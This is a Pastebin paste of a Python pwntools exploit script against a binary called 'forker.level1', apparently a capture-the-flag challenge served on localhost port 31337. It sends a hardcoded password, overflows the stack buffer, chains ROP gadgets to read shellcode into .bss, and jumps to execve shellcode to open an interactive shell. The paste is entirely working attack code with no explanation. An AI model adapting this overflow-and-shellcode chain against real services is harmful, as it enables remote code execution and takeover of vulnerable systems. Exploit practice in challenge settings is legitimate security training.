Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # coding: utf-8
- from pwn import *
- context.arch = 'amd64'
- e = ELF("./forker.level1")
- p = remote("localhost", 31337)
- rdiret = 0x0000000000400c13
- rsir15ret = 0x0000000000400c11
- print p.recvuntil("Password:")
- payload = "INTERNET_FUNNY_MUNNY\x00"
- payload += "A" * (76 - len(payload))
- payload += "\x50"
- payload += "A" * 8 # RBP
- payload += p64(rdiret)
- payload += p64(4)
- payload += p64(rsir15ret)
- payload += p64(e.bss())
- payload += p64(0)
- payload += p64(e.plt['read'])
- # shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
- shellcode = pwnlib.shellcraft.amd64.linux.syscall('SYS_execve', 1, 'rsp', 2, 0).rstrip()
- payload += p64(e.bss())
- payload += shellcode
- p.sendline(payload)
- p.sendline(asm("jmp rsp"))
- print p.recv(1024, timeout=0.5)
- p.interactive()
Add Comment
Please, Sign In to add comment